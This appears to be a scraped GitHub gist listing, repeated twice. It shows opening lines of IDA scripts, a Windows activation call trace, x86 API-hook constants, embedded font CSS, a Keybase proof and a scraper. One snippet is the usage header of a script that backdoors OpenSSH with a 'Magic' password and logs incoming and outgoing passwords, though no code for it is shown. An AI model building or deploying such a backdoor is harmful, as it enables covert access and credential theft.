NyaMisty

## riscv-processor-deva.py
import pydevd
pydevd.settrace('localhost', port=15306, stdoutToServer=True, stderrToServer=True)

from idaapi import *
from idc import *
import idautils
import copy
import ctypes


## gist:3bcfa09eaa900221803a1f603b486da1
(launcher)      ShellExecute...etc.
(launcher)      IApplicationActivationManager::ActivateApplication::..
(ActXPrxy.dll)  ====RPC====
(sihost.exe)    twinui.appcore.dll::CApplicationActivationManager::..
(ActXPrxy.dll)  ====RPC====
(sihost.exe)    ActivationManager.dll::Execution::ActivationManagerShim::ActivateApplicationForProtocol
(sihost.exe)    ActivationManager.dll::Execution::ActivationManagerShim::ActivateApplicationForContractByAcid
(sihost.exe)    ActivationManager.dll::Execution::ActivationManagerShim::ActivateApplicationForContractByAcidAsUserWithHost
(sihost.exe)    ActivationManager.dll::Execution::ActivationManagerShim::_ActivateApplicationForContractByAcid
(sihost.exe)    twinui.appcore.dll::CApplicationActivationManager::ActivateApplicationForContractByAcidAsUserWithHost

## openssh-autobackdoor.bash
#!/bin/bash
# ============================================
# satyr's openssh autobackdooring doohicky v0.-1
#  ImpendingSatyr@gmail.com
# ============================================
# USAGE:
#      Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing).
#      If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything
#      (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc.
#      [it'll install them via apt or yum, whichever is available]).

## ldasm.py
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.

## apihook.py

MAX_INSN_LEN = 15  # maximum length of x86 instruction

JMP_OPCODE = 0xE9
PUSH_OPCODE = 0x68
MOV_OPCODE = 0xC7
RET_OPCODE = 0xC3

MOV_MODRM_BYTE = 0x44  # write to address + 1 byte displacement
MOV_SIB_BYTE = 0x24  # write to [rsp]

## .css
@font-face {
    font-family: 'huakang_shaonv_for_powerline';
    src: url(data:application/font-woff2;charset=utf-8;base64,d09GMgABAAAAAF0sABEAAAAAwBQAAFzDAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGh4GYACDYghaCYRlEQgKgthUgrRsATYCJAOHIguDVAAEIAWGIgeFTAyCaj93ZWJmBhsoqzXizQ4FdAfwqFRqVTUSIWwcIIB+lzoyEGwcEEjgYfb/fz5ujIEPWtn3JLZk2xasrMoikzWcmms09pwoKqeed20Uxtt5hIM950fF+9CkkablnVWkqLBII00DSujS/+fQnVq+Q4pPZDh+WDAklqDBlrGCzJsK/Q5DyXpeFKeo3Wnu6EEuzBNs7ivPlcYXbd9//XR/rFnKoJElUklix4LuG5inkKF0XYo2FFrR4Q4OSYLI+lHd56uZWsA925v470bATGCfNAFvZiU+iT7BPUBu6xRQLByo4EbcKW40IUUB5ZQ7GYIiiIgIIghu0HBQjpXmGqU2NLU9/m3YW9/aNn+0vu9X9WPFw//vj2+f+85Houpv7BwlJSiDjMxyZJs1EaFPk5N0TNP/iDzGGGFMCEZ8jDEiEsF6imIriXJczh5XdddbFO2WW29TvK7YXfh/mvZ7yWbL5Cezybbfyw2tDKV5PAiFcAiFk+39qgQaYY7D7n42/aR1coXkXBckHo1sz0v2ExTNOVOUV7RUEb0egBYC7YdBN/8LJBACUSBIQwsVakbpU/2m059uWX27db9tvyVzVeVo2pckurtwi3HDcizaUY3ZuntvkugznySfxmT/kXEkOEB9wML/l6n5PSJqNeuwmAYJT9B4gITAAd2jnM18ECkIonteN3arFGQ/SH6Q9zeVO/9Tl0k2/7cKVml7m4NQNPEqpEknT+pwx3xYIXh9WN1Pdr07n2jaVH1SHfcCY97BpfkFDxYfbIok

## huakang_shaonv_for_powerline_updated.css
/*! Generated by Font Squirrel (https://www.fontsquirrel.com) on January 5, 2019 */


@font-face {
    font-family: 'huakang_shaonv_for_powerline_updated';
    src: url(data:application/font-woff;charset=utf-8;base64,d09GRgABAAAAM2boABEAAABQpggAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAAABgAAAABwAAAAcgKK3skdERUYAAAGcAAAAHgAAAB4AJy2nT1MvMgAAAbwAAABgAAAAYK+b6nVjbWFwAAACHAAAV90AAIlefs99+WN2dCAAAFn8AAAASgAAAFyhNPxwZnBnbQAAWkgAAAAUAAAAFIMzwk9nYXNwAABaXAAAAAgAAAAIAAAAEGdseWYAAFpkADGLJABM5uhcvnKPaGVhZAAx5YgAAAAzAAAANg8gmVxoaGVhADHlvAAAACEAAAAkDF4z3WhtdHgAMeXgAAA7BwAAtoQoYkdGbG9jYQAyIOgAAH9pAAC2iGpID9BtYXhwADKgVAAAACAAAAAgLkACZW5hbWUAMqB0AAABWQAAAyAoYG+ZcG9zdAAyodAAAMSzAAHCQHBFRvVwcmVwADNmhAAAAFwAAACd8oN2q3dlYmYAM2bgAAAABgAAAAaxglwwAAAAAQAAAADX2mhSAAAAANBx7YIAAAAA2FZh3QABAAAADAAAABYAAAACAAEAAS2gAAEABAAAAAIAAAAAAAQG3AGQAAUABAaQBhgAAAFXBpAGGAAABEAAeAJtAAACAQYJAwEBAQEB5gAm/wgH+PsAAAAYAAAAAHVuY2kBgAAK//sHoP5mAAAHoADIYAIB3//fAAAEGgXcAAAAIAABeNqM2vdbkwm7LWAFxY69D13F3nvvji29EBKSkJBGCpBOAqSTUAKhhQ7WsWs66Y597N2xiyJgL6NjF84+787hQm

## iphlpapi.py
import ctypes
from ctypes import Structure, POINTER, c_char, c_void_p, c_ulong
from ctypes.wintypes import DWORD, UINT, BYTE, BOOL, ULONG, WCHAR, WORD, USHORT, BOOLEAN
from winerror import NO_ERROR, ERROR_INSUFFICIENT_BUFFER
from comtypes import GUID

ULONGLONG = ctypes.c_ulonglong
ULONG64 = ctypes.c_uint64
UCHAR = ctypes.c_ubyte

## gist:9f25fedaec9768e2dfac5fd4d33bc7c6
### Keybase proof

I hereby claim:

  * I am nyamisty on github.
  * I am nyamisty (https://keybase.io/nyamisty) on keybase.
  * I have a public key ASD7LTpwNB5Z8nVVe7ulyhPeHBI9MzdkccnsRkhNGZuh2wo

To claim this, I am signing this object:

## add_nijisanji.py
#coding: utf8
import sys
reload(sys)
sys.setdefaultencoding("UTF8")

import requests, re, json
sess = requests.Session()
r = sess.get("https://nijisanji.ichikara.co.jp/member/")
urls = re.findall(r"href=(https://nijisanji\.ichikara\.co\.jp/member/.*?)>", r.text)
	import pydevd
	pydevd.settrace('localhost', port=15306, stdoutToServer=True, stderrToServer=True)

	from idaapi import *
	from idc import *
	import idautils
	import copy
	import ctypes
	(launcher) ShellExecute...etc.
	(launcher) IApplicationActivationManager::ActivateApplication::..
	(ActXPrxy.dll) ====RPC====
	(sihost.exe) twinui.appcore.dll::CApplicationActivationManager::..
	(ActXPrxy.dll) ====RPC====
	(sihost.exe) ActivationManager.dll::Execution::ActivationManagerShim::ActivateApplicationForProtocol
	(sihost.exe) ActivationManager.dll::Execution::ActivationManagerShim::ActivateApplicationForContractByAcid
	(sihost.exe) ActivationManager.dll::Execution::ActivationManagerShim::ActivateApplicationForContractByAcidAsUserWithHost
	(sihost.exe) ActivationManager.dll::Execution::ActivationManagerShim::_ActivateApplicationForContractByAcid
	(sihost.exe) twinui.appcore.dll::CApplicationActivationManager::ActivateApplicationForContractByAcidAsUserWithHost
	#!/bin/bash
	# ============================================
	# satyr's openssh autobackdooring doohicky v0.-1
	# ImpendingSatyr@gmail.com
	# ============================================
	# USAGE:
	# Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing).
	# If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything
	# (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc.
	# [it'll install them via apt or yum, whichever is available]).
	# This program is free software: you can redistribute it and/or modify
	# it under the terms of the GNU General Public License as published by
	# the Free Software Foundation, either version 3 of the License, or
	# (at your option) any later version.

	# This program is distributed in the hope that it will be useful,
	# but WITHOUT ANY WARRANTY without even the implied warranty of
	# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
	# GNU General Public License for more details.

	MAX_INSN_LEN = 15 # maximum length of x86 instruction

	JMP_OPCODE = 0xE9
	PUSH_OPCODE = 0x68
	MOV_OPCODE = 0xC7
	RET_OPCODE = 0xC3

	MOV_MODRM_BYTE = 0x44 # write to address + 1 byte displacement
	MOV_SIB_BYTE = 0x24 # write to [rsp]
	@font-face {
	font-family: 'huakang_shaonv_for_powerline';
	src: url(data:application/font-woff2;charset=utf-8;base64,d09GMgABAAAAAF0sABEAAAAAwBQAAFzDAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGh4GYACDYghaCYRlEQgKgthUgrRsATYCJAOHIguDVAAEIAWGIgeFTAyCaj93ZWJmBhsoqzXizQ4FdAfwqFRqVTUSIWwcIIB+lzoyEGwcEEjgYfb/fz5ujIEPWtn3JLZk2xasrMoikzWcmms09pwoKqeed20Uxtt5hIM950fF+9CkkablnVWkqLBII00DSujS/+fQnVq+Q4pPZDh+WDAklqDBlrGCzJsK/Q5DyXpeFKeo3Wnu6EEuzBNs7ivPlcYXbd9//XR/rFnKoJElUklix4LuG5inkKF0XYo2FFrR4Q4OSYLI+lHd56uZWsA925v470bATGCfNAFvZiU+iT7BPUBu6xRQLByo4EbcKW40IUUB5ZQ7GYIiiIgIIghu0HBQjpXmGqU2NLU9/m3YW9/aNn+0vu9X9WPFw//vj2+f+85Houpv7BwlJSiDjMxyZJs1EaFPk5N0TNP/iDzGGGFMCEZ8jDEiEsF6imIriXJczh5XdddbFO2WW29TvK7YXfh/mvZ7yWbL5Cezybbfyw2tDKV5PAiFcAiFk+39qgQaYY7D7n42/aR1coXkXBckHo1sz0v2ExTNOVOUV7RUEb0egBYC7YdBN/8LJBACUSBIQwsVakbpU/2m059uWX27db9tvyVzVeVo2pckurtwi3HDcizaUY3ZuntvkugznySfxmT/kXEkOEB9wML/l6n5PSJqNeuwmAYJT9B4gITAAd2jnM18ECkIonteN3arFGQ/SH6Q9zeVO/9Tl0k2/7cKVml7m4NQNPEqpEknT+pwx3xYIXh9WN1Pdr07n2jaVH1SHfcCY97BpfkFDxYfbIok
	/! Generated by Font Squirrel (https://www.fontsquirrel.com) on January 5, 2019 /



	@font-face {
	font-family: 'huakang_shaonv_for_powerline_updated';
	src: url(data:application/font-woff;charset=utf-8;base64,d09GRgABAAAAM2boABEAAABQpggAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAAABgAAAABwAAAAcgKK3skdERUYAAAGcAAAAHgAAAB4AJy2nT1MvMgAAAbwAAABgAAAAYK+b6nVjbWFwAAACHAAAV90AAIlefs99+WN2dCAAAFn8AAAASgAAAFyhNPxwZnBnbQAAWkgAAAAUAAAAFIMzwk9nYXNwAABaXAAAAAgAAAAIAAAAEGdseWYAAFpkADGLJABM5uhcvnKPaGVhZAAx5YgAAAAzAAAANg8gmVxoaGVhADHlvAAAACEAAAAkDF4z3WhtdHgAMeXgAAA7BwAAtoQoYkdGbG9jYQAyIOgAAH9pAAC2iGpID9BtYXhwADKgVAAAACAAAAAgLkACZW5hbWUAMqB0AAABWQAAAyAoYG+ZcG9zdAAyodAAAMSzAAHCQHBFRvVwcmVwADNmhAAAAFwAAACd8oN2q3dlYmYAM2bgAAAABgAAAAaxglwwAAAAAQAAAADX2mhSAAAAANBx7YIAAAAA2FZh3QABAAAADAAAABYAAAACAAEAAS2gAAEABAAAAAIAAAAAAAQG3AGQAAUABAaQBhgAAAFXBpAGGAAABEAAeAJtAAACAQYJAwEBAQEB5gAm/wgH+PsAAAAYAAAAAHVuY2kBgAAK//sHoP5mAAAHoADIYAIB3//fAAAEGgXcAAAAIAABeNqM2vdbkwm7LWAFxY69D13F3nvvji29EBKSkJBGCpBOAqSTUAKhhQ7WsWs66Y597N2xiyJgL6NjF84+787hQm
	import ctypes
	from ctypes import Structure, POINTER, c_char, c_void_p, c_ulong
	from ctypes.wintypes import DWORD, UINT, BYTE, BOOL, ULONG, WCHAR, WORD, USHORT, BOOLEAN
	from winerror import NO_ERROR, ERROR_INSUFFICIENT_BUFFER
	from comtypes import GUID

	ULONGLONG = ctypes.c_ulonglong
	ULONG64 = ctypes.c_uint64
	UCHAR = ctypes.c_ubyte
	### Keybase proof

	I hereby claim:

	* I am nyamisty on github.
	* I am nyamisty (https://keybase.io/nyamisty) on keybase.
	* I have a public key ASD7LTpwNB5Z8nVVe7ulyhPeHBI9MzdkccnsRkhNGZuh2wo

	To claim this, I am signing this object:
	#coding: utf8
	import sys
	reload(sys)
	sys.setdefaultencoding("UTF8")

	import requests, re, json
	sess = requests.Session()
	r = sess.get("https://nijisanji.ichikara.co.jp/member/")
	urls = re.findall(r"href=(https://nijisanji\.ichikara\.co\.jp/member/.*?)>", r.text)